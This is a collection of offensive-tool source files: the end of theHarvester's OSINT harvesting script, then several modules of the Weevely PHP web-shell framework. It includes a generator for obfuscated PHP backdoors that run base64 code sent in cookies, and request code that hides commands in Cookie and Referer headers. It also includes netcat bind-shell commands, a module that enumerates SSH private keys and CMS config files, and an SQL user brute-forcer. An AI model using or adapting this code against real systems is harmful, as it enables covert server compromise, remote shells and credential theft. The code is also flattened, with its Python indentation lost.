search.process()
people = search.get_people()
print "Users from Jigsaw:"
print "====================="
for user in people:
print user
sys.exit()
elif engine == "dogpilesearch":
print "[-] Searching in Dogpilesearch.."
search = dogpilesearch.search_dogpile(word, limit)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "yahoo":
print "[-] Searching in Yahoo.."
search = yahoosearch.search_yahoo(word, limit)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "baidu":
print "[-] Searching in Baidu.."
search = baidusearch.search_baidu(word, limit)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "googleplus":
print "[-] Searching in Google+ .."
search = googleplussearch.search_googleplus(word, limit)
search.process()
people = search.get_people()
print "Users from Google+:"
print "===================="
for user in people:
print user
sys.exit()
elif engine == "twitter":
print "[-] Searching in Twitter .."
search = twittersearch.search_twitter(word, limit)
search.process()
people = search.get_people()
print "Users from Twitter:"
print "===================="
for user in people:
print user
sys.exit()
elif engine == "linkedin":
print "[-] Searching in Linkedin.."
search = linkedinsearch.search_linkedin(word, limit)
search.process()
people = search.get_people()
print "Users from Linkedin:"
print "===================="
for user in people:
print user
sys.exit()
elif engine == "google-profiles":
print "[-] Searching in Google profiles.."
search = googlesearch.search_google(word, limit, start)
search.process_profiles()
people = search.get_profiles()
print "Users from Google profiles:"
print "---------------------------"
for users in people:
print users
sys.exit()
elif engine == "all":
print "Full harvest.."
all_emails = []
all_hosts = []
virtual = "basic"
print "[-] Searching in Google.."
search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
all_emails.extend(emails)
all_hosts.extend(hosts)
print "[-] Searching in PGP Key server.."
search = pgpsearch.search_pgp(word)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
all_hosts.extend(hosts)
all_emails.extend(emails)
print "[-] Searching in Bing.."
bingapi = "no"
search = bingsearch.search_bing(word, limit, start)
search.process(bingapi)
emails = search.get_emails()
hosts = search.get_hostnames()
all_hosts.extend(hosts)
all_emails.extend(emails)
print "[-] Searching in Exalead.."
search = exaleadsearch.search_exalead(word, limit, start)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
all_hosts.extend(hosts)
all_emails.extend(emails)
#Results############################################################
print "\n\n[+] Emails found:"
print "------------------"
if all_emails == []:
print "No emails found"
else:
for emails in all_emails:
print emails
print "\n[+] Hosts found in search engines:"
print "------------------------------------"
if all_hosts == []:
print "No hosts found"
else:
print "[-] Resolving hostnames IPs... "
full_host = hostchecker.Checker(all_hosts)
full = full_host.check()
for host in full:
ip = host.split(':')[0]
print host
if host_ip.count(ip.lower()):
pass
else:
host_ip.append(ip.lower())
#DNS reverse lookup#################################################
dnsrev = []
if dnslookup == True:
print "\n[+] Starting active queries:"
analyzed_ranges = []
for x in full:
ip = x.split(":")[0]
range = ip.split(".")
range[3] = "0/24"
range = string.join(range, '.')
if not analyzed_ranges.count(range):
print "[-]Performing reverse lookup in :" + range
a = dnssearch.dns_reverse(range, True)
a.list()
res = a.process()
analyzed_ranges.append(range)
else:
continue
for x in res:
if x.count(word):
dnsrev.append(x)
if x not in full:
full.append(x)
print "Hosts found after reverse lookup:"
print "---------------------------------"
for xh in dnsrev:
print xh
#DNS Brute force####################################################
dnsres = []
if dnsbrute == True:
print "\n[-] Starting DNS brute force:"
a = dnssearch.dns_force(word, dnsserver, verbose=True)
res = a.process()
print "\n[+] Hosts found after DNS brute force:\n"
for y in res:
print y
dnsres.append(y)
if y not in full:
full.append(y)
#DNS TLD expansion###################################################
dnstldres = []
if dnstld == True:
print "[-] Starting DNS TLD expansion:"
a = dnssearch.dns_tld(word, dnsserver, verbose=True)
res = a.process()
print "\n[+] Hosts found after DNS TLD expansion:"
print "=========================================="
for y in res:
print y
dnstldres.append(y)
if y not in full:
full.append(y)
#Virtual hosts search###############################################
if virtual == "basic":
print "[+] Virtual hosts:"
print "=================="
for l in host_ip:
search = bingsearch.search_bing(l, limit, start)
search.process_vhost()
res = search.get_allhostnames()
for x in res:
x = re.sub(r'[[\<\/?]*[\w]*>]*','',x)
x = re.sub('<','',x)
x = re.sub('>','',x)
print l + "\t" + x
vhost.append(l + ":" + x)
full.append(l + ":" + x)
else:
pass
shodanres = []
shodanvisited = []
if shodan == True:
print "[+] Shodan Database search:"
for x in full:
print x
try:
ip = x.split(":")[0]
if not shodanvisited.count(ip):
print "\tSearching for: " + x
a = shodansearch.search_shodan(ip)
shodanvisited.append(ip)
results = a.run()
for res in results:
shodanres.append(
x + "SAPO" + str(res['banner']) + "SAPO" + str(res['port']))
except:
pass
print "[+] Shodan results:"
print "==================="
for x in shodanres:
print x.split("SAPO")[0] + ":" + x.split("SAPO")[1]
else:
pass
###################################################################
# Here i need to add explosion mode.
# Tengo que sacar los TLD para hacer esto.
recursion = None
if recursion:
start = 0
for word in vhost:
search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
print emails
print hosts
else:
pass
if filename != "":
try:
print "[+] Saving files..."
html = htmlExport.htmlExport(
all_emails,
full,
vhost,
dnsres,
dnsrev,
filename,
word,
shodanres,
dnstldres)
save = html.writehtml()
except Exception as e:
print e
print "Error creating the file"
try:
filename = filename.split(".")[0] + ".xml"
file = open(filename, 'w')
file.write('<?xml version="1.0" encoding="UTF-8"?><theHarvester>')
for x in all_emails:
file.write('<email>' + x + '</email>')
for x in all_hosts:
file.write('<host>' + x + '</host>')
for x in vhost:
file.write('<vhost>' + x + '</vhost>')
file.write('</theHarvester>')
file.flush()
file.close()
print "Files saved!"
except Exception as er:
print "Error saving XML file: " + er
sys.exit()
if __name__ == "__main__":
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print "Search interrupted by user.."
except:
sys.exit()
```
#### File: Weevely/core/backdoor.py
```python
import base64, codecs
from random import random, randrange, choice, shuffle
from pollution import pollute_with_static_str
from core.utils import randstr
from core.moduleexception import ModuleException
from string import Template, ascii_letters, digits
PERMITTED_CHARS = ascii_letters + digits + '_.~'
WARN_SHORT_PWD = 'Invalid password, use words longer than 3 characters'
WARN_CHARS = 'Invalid password, password permitted chars are \'%s\'' % PERMITTED_CHARS
class BdTemplate(Template):
delimiter = '%'
class Backdoor:
payload_template= """
$c='count';
$a=$_COOKIE;
if(reset($a)=='%STARTKEY' && $c($a)>3){
$k='%ENDKEY';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
"""
backdoor_template = """<?php
$%PAY_VAR1="%PAY1";
$%PAY_VAR2="%PAY2";
$%PAY_VAR3="%PAY3";
$%PAY_VAR4="%PAY4";
$%REPL_FUNC = str_replace("%REPL_POLL","","%REPL_ENC");
$%B64_FUNC = $%REPL_FUNC("%B64_POLL", "", "%B64_ENC");
$%CREAT_FUNC = $%REPL_FUNC("%CREAT_POLL","","%CREAT_ENC");
$%FINAL_FUNC = $%CREAT_FUNC('', $%B64_FUNC($%REPL_FUNC("%PAY_POLL", "", $%PAY_VAR1.$%PAY_VAR2.$%PAY_VAR3.$%PAY_VAR4))); $%FINAL_FUNC();
?>"""
def __init__( self, password ):
self.__check_pwd(password)
self.password = password
self.start_key = self.password[:2]
self.end_key = self.password[2:]
self.payload = BdTemplate(self.payload_template).substitute(STARTKEY = self.start_key, ENDKEY = self.end_key).replace( '\n', '' )
self.backdoor = self.encode_template()
def __str__( self ):
return self.backdoor
def __check_pwd(self, password):
if len(password)<4:
raise ModuleException('generate','\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate','\'%s\' %s' % (password, WARN_CHARS))
def encode_template(self):
b64_new_func_name = randstr()
b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7)
createfunc_name = randstr()
createfunc_pollution, createfunc_polluted = pollute_with_static_str('create_function',frequency=0.7)
payload_var = [ randstr() for st in range(4) ]
payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload))
replace_new_func_name = randstr()
repl_pollution, repl_polluted = pollute_with_static_str('str_replace',frequency=0.7)
final_func_name = randstr()
length = len(payload_polluted)
offset = 7
piece1 = length / 4 + randrange(-offset,+offset)
piece2 = length / 2 + randrange(-offset,+offset)
piece3 = length*3/4 + randrange(-offset,+offset)
ts_splitted = self.backdoor_template.splitlines()
ts_shuffled = ts_splitted[1:6]
shuffle(ts_shuffled)
ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:]
self.backdoor_template = '\n'.join(ts_splitted)
return BdTemplate(self.backdoor_template).substitute(
B64_FUNC = b64_new_func_name,
B64_ENC = b64_polluted,
B64_POLL = b64_pollution,
CREAT_FUNC = createfunc_name,
CREAT_ENC = createfunc_polluted,
CREAT_POLL = createfunc_pollution,
REPL_FUNC = replace_new_func_name,
REPL_ENC = repl_polluted,
REPL_POLL = repl_pollution,
PAY_VAR1 = payload_var[0],
PAY_VAR2 = payload_var[1],
PAY_VAR3 = payload_var[2],
PAY_VAR4 = payload_var[3],
PAY_POLL = payload_pollution,
PAY1 = payload_polluted[:piece1],
PAY2 = payload_polluted[piece1:piece2],
PAY3 = payload_polluted[piece2:piece3],
PAY4 = payload_polluted[piece3:],
FINAL_FUNC = final_func_name)
```
#### File: Weevely/core/configs.py
```python
import os
import core.terminal
import atexit
try:
import readline
except ImportError:
try:
import pyreadline as readline
except ImportError:
print '[!] Error, readline or pyreadline python module required. In Ubuntu linux run\n[!] sudo apt-get install python-readline'
sys.exit(1)
dirpath = '.weevely'
rcfilepath = 'weevely.rc'
historyfilepath = 'weevely_history'
class Configs:
def _read_rc(self, rcpath):
try:
rcfile = open(rcpath, 'r')
except Exception, e:
self._tprint( "[!] Error opening '%s' file." % rcpath)
else:
return [c.strip() for c in rcfile.read().split('\n') if c.strip() and c[0] != '#']
return []
def _historyfile(self):
return os.path.join(self.dirpath, historyfilepath)
def _make_home_folder(self):
self.dirpath = os.path.join(os.path.expanduser('~'),dirpath)
if not os.path.exists(self.dirpath):
os.mkdir(self.dirpath)
def _init_completion(self):
self.historyfile = self._historyfile()
self.matching_words = [':%s' % m for m in self.modhandler.modules_classes.keys()] + [core.terminal.help_string, core.terminal.load_string, core.terminal.set_string]
try:
readline.set_history_length(100)
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind( 'tab: complete' )
readline.set_completer( self._complete )
readline.read_history_file( self.historyfile )
except IOError:
pass
atexit.register( readline.write_history_file, self.historyfile )
def _complete(self, text, state):
"""Generic readline completion entry point."""
try:
buffer = readline.get_line_buffer()
line = readline.get_line_buffer().split()
if ' ' in buffer:
return []
# show all commandspath
if not line:
all_cmnds = [c + ' ' for c in self.matching_words]
if len(all_cmnds) > state:
return all_cmnds[state]
else:
return []
cmd = line[0].strip()
if cmd in self.matching_words:
return [cmd + ' '][state]
results = [c + ' ' for c in self.matching_words if c.startswith(cmd)] + [None]
if len(results) == 2:
if results[state]:
return results[state].split()[0] + ' '
else:
return []
return results[state]
except Exception, e:
self._tprint('[!] Completion error: %s' % e)
```
#### File: core/http/cmdrequest.py
```python
import urllib2, urlparse, re, base64
from request import Request
from random import random, shuffle
from string import letters, digits
from core.pollution import pollute_with_random_str
from core.utils import randstr
default_prefixes = [ "ID", "SID", "APISID", "USRID", "SESSID", "SESS", "SSID", "USR", "PREF" ]
shuffle(default_prefixes)
class CmdRequest(Request):
def __init__( self, url, password, proxy = None ):
Request.__init__( self, url, proxy)
self.password = password
self.extractor = re.compile( "<%s>(.*)</%s>" % ( self.password[2:], self.password[2:] ), re.DOTALL )
# self.extractor_debug = re.compile( "<%sDEBUG>(.*)</%sDEBUG>" % ( self.password[2:], self.password[2:] ), re.DOTALL )
self.parsed = urlparse.urlparse(self.url)
self.data = None
if not self.parsed.path:
self.query = self.parsed.netloc.replace( '/', ' ' )
else:
self.query = ''.join( self.parsed.path.split('.')[:-1] ).replace( '/', ' ' )
def setPayload( self, payload, mode):
payload = base64.b64encode( payload.strip() )
length = len(payload)
third = length / 3
thirds = third * 2
if mode == 'Referer':
referer = "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % ( self.password[:2], \
urllib2.quote( self.url ), \
self.query.strip(), \
payload[:third], \
payload[third:thirds], \
payload[thirds:] )
self['Referer'] = referer
else: # mode == 'Cookie' or unset
prefixes = default_prefixes[:]
rand_cookie = ''
rand_cookie += prefixes.pop() + '=' + self.password[:2] + '; '
while len(prefixes)>3:
if random()>0.5:
break
rand_cookie += prefixes.pop() + '=' + randstr(16, False, letters + digits) + '; '
# DO NOT fuzz with %, _ (\w on regexp keep _)
payload = pollute_with_random_str(payload, '#&*-/?@~')
rand_cookie += prefixes.pop() + '=' + payload[:third] + '; '
rand_cookie += prefixes.pop() + '=' + payload[third:thirds] + '; '
rand_cookie += prefixes.pop() + '=' + payload[thirds:]
self['Cookie'] = rand_cookie
def setPostData(self, data_dict):
self.data = data_dict.copy()
def execute( self , bytes = -1):
response = self.read()
# print self.extractor_debug.findall(response)
data = self.extractor.findall(response)
if len(data) < 1 or not data:
raise NoDataException()
else:
return data[0].strip()
class NoDataException(Exception):
pass
```
#### File: Weevely/core/vector.py
```python
from core.moduleexception import ModuleException
from string import Template
from types import ListType, StringTypes, DictType
import thread
import collections
class VectorsDict(collections.OrderedDict):
def __init__(self, modhandler, *args):
self.modhandler = modhandler
collections.OrderedDict.__init__(self, args)
def add_vector(self, name, interpreter, payloads):
self[name] = Vector(self.modhandler, name, interpreter, payloads)
def get(self, name):
return self[name]
class Vector:
def __init__(self, modhandler, name, interpreter, payloads):
self.modhandler = modhandler
self.name = name
self.interpreter = interpreter
# Payloads and Formats are lists
self.payloads = []
if payloads and isinstance(payloads, ListType):
self.payloads = payloads
elif payloads and isinstance (payloads, StringTypes):
self.payloads.append(payloads)
def execute(self, format_list = {}, return_out_res = False):
# Check type dict
if not isinstance(format_list, DictType):
raise Exception("[!][%s] Error, format vector type is not dict: '%s'" % (self.name, format_list))
formatted_list = []
format_template_list = format_list.keys()
for payload in self.payloads:
# Search format keys present in current payload part
list_of_key_formats_in_payload = [s for s in format_template_list if '$%s' % s in payload]
# Extract from format dict just the ones for current payload part
dict_of_formats_in_payload = {}
for k, v in format_list.iteritems():
if k in list_of_key_formats_in_payload:
dict_of_formats_in_payload[k]=v
if dict_of_formats_in_payload:
formatted_list.append(Template(payload).safe_substitute(**dict_of_formats_in_payload))
else:
formatted_list.append(payload)
res, out = self.modhandler.load(self.interpreter).run(formatted_list)
if return_out_res:
return out, res
else:
return res
def execute_background(self, format_list = {}):
thread.start_new_thread(self.execute, (format_list,))
```
#### File: modules/audit/phpconf.py
```python
from core.module import Module
from core.moduleexception import ProbeException
from core.argparse import ArgumentParser
from ast import literal_eval
from core.utils import chunks
from re import findall
from types import ListType
from core.prettytable import PrettyTable, ALL
import os
MSG_BASEDIR='Your base directory is presently set to $$BASEDIR$$ - PHP scripts will not be able to access the file system outside of this directory.'
ERR_CONFIG_BASEDIR='Enabled base_dir conf '
ERR_CONFIG_BASEDIR_NOT_SET='not restricted '
ERR_CONFIG_BASEDIR_CHDIR='\nchangeable because of \'.\' '
ERR_CONFIG_BASEDIR_SLASH='\nwithout trailing "/" '
ERR_CONFIG_PHPUSER='Root account could be abuse'
WARN_CONFIG_PHPUSER_WIN='Ensure that this user is not an administrator'
ERR_FUNCTION_PROFILE='Enabled functs to gather\nPHP configuration'
WARN_FUNCTION_FILES='Enabled functs to access\nto the filesystem'
ERR_FUNCTION_EXECUTE='Enabled functs to execute\ncommands'
ERR_FUNCTION_LOGGING='Enabled functs to tamper\nlog files'
ERR_FUNCTION_DISRUPT='Enabled functs to disrupt\nother process'
ERR_CONFIG_EXECUTE='Enabled confs that allow\ncommand executions'
ERR_CONFIG_ERRORS='Enble confs that displays\ninformation on errors'
WARN_CONFIG_SAFEMODE='Enabled confs that restrict\nfilesystem access and\nsystem command execution'
WARN_SESS_PATH = 'Disabled conf to move sessions\nfiles in a protected folder'
WARN_CONFIG_UPLOAD='Enabled confs to\nupload files'
ERR_CONFIG_INCLUDES='Enabled confs to allow\nremote files opening'
ERR_CONFIG_PROFILE='Enabled confs to gather\nPHP configuration infos'
ERR_CONFIG_GLOBALS='Enabled conf register_globals\nallows malicious variable manipulation'
WARN_MAGIC_QUOTES='Enabled confs that provide\nineffective SQLi protection'
ERR_SESS_TRANS='Enabled conf to pass\nsession ID via the URL'
insecure_features = """
$insecure_features = array();
$insecure_features['expose_php'] = 'ERR_CONFIG_PROFILE';
$insecure_features['file_uploads'] = 'WARN_CONFIG_UPLOAD';
$insecure_features['register_globals'] = 'ERR_CONFIG_GLOBALS';
$insecure_features['allow_url_fopen'] = 'ERR_CONFIG_INCLUDES';
$insecure_features['display_errors'] = 'ERR_CONFIG_ERRORS';
$insecure_features['enable_dl'] = 'ERR_CONFIG_EXECUTE';
$insecure_features['safe_mode'] = 'WARN_CONFIG_SAFEMODE';
$insecure_features['magic_quotes_gpc'] = 'WARN_MAGIC_QUOTES';
$insecure_features['allow_url_include'] = 'ERR_CONFIG_INCLUDES';
$insecure_features['session.use_trans_sid'] = 'ERR_SESS_TRANS';
foreach ( $insecure_features as $feature_key => $feature_message )
if ((bool)ini_get($feature_key) ) print($feature_key . " " . $feature_message. "|");"""
insecure_classes = """
$insecure_classes = array();
$insecure_classes['splFileObject'] = 'ERR_CONFIG_EXECUTE';
foreach ( $insecure_classes as $class_key => $class_message )
{
if ( class_exists($class_key) ) print($class_key . "() " . $class_message . "|");
}"""
insecure_functions = """
$insecure_functions = array();
$insecure_functions['apache_child_terminate'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['apache_get_modules'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['apache_get_version'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['apache_getenv'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['get_loaded_extensions'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['phpinfo'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['phpversion'] = 'ERR_FUNCTION_PROFILE';
$insecure_functions['chgrp'] = 'WARN_FUNCTION_FILES';
$insecure_functions['chmod'] = 'WARN_FUNCTION_FILES';
$insecure_functions['chown'] = 'WARN_FUNCTION_FILES';
$insecure_functions['copy'] = 'WARN_FUNCTION_FILES';
$insecure_functions['link'] = 'WARN_FUNCTION_FILES';
$insecure_functions['mkdir'] = 'WARN_FUNCTION_FILES';
$insecure_functions['rename'] = 'WARN_FUNCTION_FILES';
$insecure_functions['rmdir'] = 'WARN_FUNCTION_FILES';
$insecure_functions['symlink'] = 'WARN_FUNCTION_FILES';
$insecure_functions['touch'] = 'WARN_FUNCTION_FILES';
$insecure_functions['unlink'] = 'WARN_FUNCTION_FILES';
$insecure_functions['openlog'] = 'ERR_FUNCTION_LOGGING';
$insecure_functions['proc_nice'] = 'ERR_FUNCTION_DISRUPT';
$insecure_functions['syslog'] = 'ERR_FUNCTION_LOGGING';
$insecure_functions['apache_note'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['apache_setenv'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['dl'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['exec'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['passthru'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['pcntl_exec'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['popen'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_close'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_open'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_get_status'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['proc_terminate'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['putenv'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['shell_exec'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['system'] = 'ERR_FUNCTION_EXECUTE';
$insecure_functions['virtual'] = 'ERR_FUNCTION_EXECUTE';
foreach ( $insecure_functions as $function_key => $function_message )
{
if ( function_exists($function_key) )
print($function_key . "() " . $function_message. "|");
}"""
class Phpconf(Module):
'''Check php security configurations'''
def _set_vectors(self):
self.support_vectors.add_vector('os', 'system.info', ["os"])
self.support_vectors.add_vector('whoami', 'system.info', ["whoami"])
self.support_vectors.add_vector('php_version', 'system.info', ['php_version'])
self.support_vectors.add_vector('open_basedir', 'system.info', ['open_basedir'])
self.support_vectors.add_vector('check_functions', 'shell.php', [ insecure_functions ])
self.support_vectors.add_vector('check_classes', 'shell.php', [ insecure_classes ])
self.support_vectors.add_vector('check_features', 'shell.php', [ insecure_features ])
def __check_os(self):
os = self.support_vectors.get('os').execute()
if 'win' in os.lower():
os = 'win'
else:
os = 'Linux'
self._result['os'] = [ os ]
def __check_version(self):
self._result['PHP version'] = [ self.support_vectors.get('php_version').execute() ]
def __check_username(self):
username = [ self.support_vectors.get('whoami').execute() ]
if self._result['os'] == 'win':
self._result['username\n(%s)' % WARN_CONFIG_PHPUSER_WIN] = username
elif username == 'root':
self._result['username\n(%s)' % ERR_CONFIG_PHPUSER] = username
else:
self._result['username'] = username
def __check_openbasedir(self):
basedir_str = self.support_vectors.get('open_basedir').execute()
err_msg = ERR_CONFIG_BASEDIR
if not basedir_str:
err_msg += ERR_CONFIG_BASEDIR_NOT_SET
self._result_insecurities[err_msg] = [ ]
else:
if self._result['os'] == 'win':
dirs = basedir_str.split(';')
else:
dirs = basedir_str.split(':')
if '.' in dirs:
err_msg += ERR_CONFIG_BASEDIR_CHDIR
trailing_slash = True
for d in dirs:
if self._result['os'] == 'win' and not d.endswith('\\') or self._result['os'] == 'Linux' and not d.endswith('/'):
trailing_slash = False
if not trailing_slash:
err_msg += ERR_CONFIG_BASEDIR_SLASH
self._result_insecurities[err_msg] = dirs
def __check_insecurities(self):
functions_str = self.support_vectors.get('check_functions').execute() + self.support_vectors.get('check_classes').execute() + self.support_vectors.get('check_features').execute()
if functions_str:
functions = findall('([\S]+) ([^|]+)\|',functions_str)
for funct, err in functions:
if err in globals():
error_msg = globals()[err]
if error_msg not in self._result_insecurities:
self._result_insecurities[error_msg] = []
self._result_insecurities[error_msg].append(funct)
def _prepare(self):
self._result = {}
self._result_insecurities = {}
def _probe(self):
self.__check_os()
self.__check_version()
self.__check_username()
self.__check_openbasedir()
self.__check_insecurities()
def _stringify_result(self):
Module._stringify_result(self)
table_insecurities = PrettyTable(['']*(2))
table_insecurities.align = 'l'
table_insecurities.header = False
table_insecurities.hrules = ALL
for res in self._result_insecurities:
if isinstance(self._result_insecurities[res], ListType):
field_str = ''
for chunk in list(chunks(self._result_insecurities[res],3)):
field_str += ', '.join(chunk) + '\n'
table_insecurities.add_row([res, field_str.rstrip() ])
self._output += '\n%s' % ( table_insecurities.get_string())
```
#### File: modules/audit/userfiles.py
```python
from core.module import Module
from core.moduleexception import ProbeException
from core.argparse import ArgumentParser
from ast import literal_eval
from core.utils import join_abs_paths
import os
class Userfiles(Module):
'''Guess files with wrong permissions in users home folders'''
def _set_vectors(self):
self.support_vectors.add_vector('enum', 'file.enum', ["asd", "-pathlist", "$pathlist"])
self.support_vectors.add_vector('users', 'audit.etcpasswd', ["-real"])
def _set_args(self):
self.argparser.add_argument('-auto-web', help='Enumerate common files in /home/*', action='store_true')
self.argparser.add_argument('-auto-home', help='Enumerate common files in /home/*/public_html/', action='store_true')
self.argparser.add_argument('-pathfile', help='Enumerate paths in PATHLIST in /home/*')
self.argparser.add_argument('-pathlist', help='Enumerate path written as [\'path1\', \'path2\',] in /home/*', type=type([]), default=[])
common_files = {
"home" : [ ".bashrc",
".bash_history",
".profile",
".ssh",
".ssh/authorized_keys",
".ssh/known_hosts",
".ssh/id_rsa",
".ssh/id_rsa.pub",
".mysql_history",
".bash_logout",
],
"web" : [ "public_html/",
"public_html/wp-config.php", # wordpress
"public_html/config.php",
"public_html/uploads",
"public_html/configuration.php", # joomla
"public_html/sites/default/settings.php", # drupal
"public_html/.htaccess" ]
}
def _prepare(self):
self._result = {}
if self.args['pathfile']:
try:
filelist=open(os.path.expanduser(self.args['pathfile']),'r').read().splitlines()
except:
raise ProbeException(self.name, "Error opening path list \'%s\'" % self.args['pathfile'])
elif self.args['pathlist']:
filelist = self.args['pathlist']
elif self.args['auto_home']:
filelist = self.common_files['home']
elif self.args['auto_web']:
filelist = self.common_files['web']
else:
filelist = self.common_files['web'] + self.common_files['home']
result = self.support_vectors.get('users').execute()
if not result:
raise ProbeException(self.name, 'Cant extract system users')
self.args['paths'] = []
for u in result:
for f in filelist:
self.args['paths'].append('/' + join_abs_paths([result[u].home, f]) )
def _probe(self):
result = self.support_vectors.get('enum').execute({'pathlist' : str(self.args['paths']) })
for user in result:
if result[user] != ['', '', '', '']:
self._result[user] = result[user]
```
#### File: modules/backdoor/tcp.py
```python
from core.moduleguess import ModuleGuess
from core.moduleexception import ModuleException, ProbeSucceed, ProbeException, ExecutionException
from core.argparse import ArgumentParser
from urlparse import urlparse
from socket import error
from telnetlib import Telnet
from time import sleep
class Tcp(ModuleGuess):
'''Open a shell on TCP port'''
def _set_vectors(self):
self.vectors.add_vector('netcat-traditional','shell.sh', """nc -l -p $port -e $shell""")
self.vectors.add_vector('netcat-bsd', 'shell.sh', """rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|$shell -i 2>&1|nc -l $port >/tmp/f; rm -rf /tmp/f""")
def _set_args(self):
self.argparser.add_argument('port', help='Port to open', type=int)
self.argparser.add_argument('-shell', help='Shell', default='/bin/sh')
self.argparser.add_argument('-vector', choices = self.vectors.keys())
self.argparser.add_argument('-no-connect', help='Skip autoconnect', action='store_true')
def _prepare(self):
self._result = ''
def _execute_vector(self):
self.current_vector.execute_background( { 'port': self.args['port'], 'shell' : self.args['shell'] })
sleep(1)
def _verify_vector_execution(self):
if not self.args['no_connect']:
urlparsed = urlparse(self.modhandler.url)
if urlparsed.hostname:
try:
Telnet(urlparsed.hostname, self.args['port']).interact()
except error, e:
self._result += '%s: %s\n' % (self.current_vector.name, str(e))
raise ExecutionException(self.name, str(e))
```
#### File: modules/bruteforce/sqlusers.py
```python
from core.module import Module
from core.moduleexception import ProbeException, ProbeSucceed
from core.argparse import ArgumentParser
from ast import literal_eval
from core.argparse import SUPPRESS
from os import sep
from string import ascii_lowercase
from random import choice
from re import compile
from sql import Sql
class Sqlusers(Sql):
"""Bruteforce all SQL users"""
def _set_args(self):
self.argparser.add_argument('-hostname', help='DBMS host or host:port', default='127.0.0.1')
self.argparser.add_argument('-wordfile', help='Local wordlist path')
self.argparser.add_argument('-startline', help='Start line of local wordlist', type=int, default=0)
self.argparser.add_argument('-chunksize', type=int, default=5000)
self.argparser.add_argument('-wordlist', help='Try words written as "[\'word1\', \'word2\']"', type=type([]), default=[])
self.argparser.add_argument('-dbms', help='DBMS', choices = ['mysql', 'postgres'], default='mysql')
def _set_vectors(self):
Sql._set_vectors(self)
self.support_vectors.add_vector('users', 'audit.etcpasswd', [])
def _prepare(self):
users = self.support_vectors.get('users').execute()
filtered_username_list = [u for u in users if 'sql' in u.lower() or 'sql' in users[u].descr.lower() or (users[u].uid == 0) or (users[u].uid > 999) or (('false' not in users[u].shell) and ('/home/' in users[u].home)) ]
self.args['username_list'] = filtered_username_list
Sql._prepare(self)
def _probe(self):
result = {}
for user in self.args['username_list']:
self.args['username'] = user
try:
Sql._probe(self)
except ProbeSucceed:
result[user] = self._result[1]
self._result = []
self._result = result
```
#### File: modules/file/check.py
```python
from core.module import Module
from core.moduleexception import ProbeException
from core.argparse import ArgumentParser
import datetime
WARN_INVALID_VALUE = 'Invalid returned value'
class Check(Module):
'''Check remote files type, md5 and permission'''
def _set_vectors(self):
self.support_vectors.add_vector('exists', 'shell.php', "$f='$rpath'; if(file_exists($f) || is_readable($f) || is_writable($f) || is_file($f) || is_dir($f)) print(1); else print(0);")
self.support_vectors.add_vector("md5" ,'shell.php', "print(md5_file('$rpath'));")
self.support_vectors.add_vector("read", 'shell.php', "(is_readable('$rpath') && print(1)) || print(0);")
self.support_vectors.add_vector("write", 'shell.php', "(is_writable('$rpath') && print(1))|| print(0);")
self.support_vectors.add_vector("exec", 'shell.php', "(is_executable('$rpath') && print(1)) || print(0);")
self.support_vectors.add_vector("isfile", 'shell.php', "(is_file('$rpath') && print(1)) || print(0);")
self.support_vectors.add_vector("size", 'shell.php', "print(filesize('$rpath'));")
self.support_vectors.add_vector("time_epoch", 'shell.php', "print(filemtime('$rpath'));")
self.support_vectors.add_vector("time", 'shell.php', "print(filemtime('$rpath'));")
def _set_args(self):
self.argparser.add_argument('rpath', help='Remote path')
self.argparser.add_argument('attr', help='Attribute to check', choices = self.support_vectors.keys())
def _probe(self):
value = self.support_vectors.get(self.args['attr']).execute(self.args)
if self.args['attr'] == 'md5' and value:
self._result = value
elif self.args['attr'] in ('size', 'time_epoch', 'time'):
try:
self._result = int(value)
except ValueError, e:
raise ProbeException(self.name, "%s: '%s'" % (WARN_INVALID_VALUE, value))
if self.args['attr'] == 'time':
self._result = datetime.datetime.fromtimestamp(self._result).strftime('%Y-%m-%d %H:%M:%S')
elif value == '1':
self._result = True
elif value == '0':
self._result = False
else:
raise ProbeException(self.name, "%s: '%s'" % (WARN_INVALID_VALUE, value))
```
#### File: modules/file/read.py
```python
from modules.file.download import Download
from tempfile import NamedTemporaryFile
from core.argparse import ArgumentParser
from core.moduleguess import ModuleGuess
class Read(Download):
'''Read remote file'''
def _set_args(self):
self.argparser.add_argument('rpath')
self.argparser.add_argument('-vector', choices = self.vectors.keys())
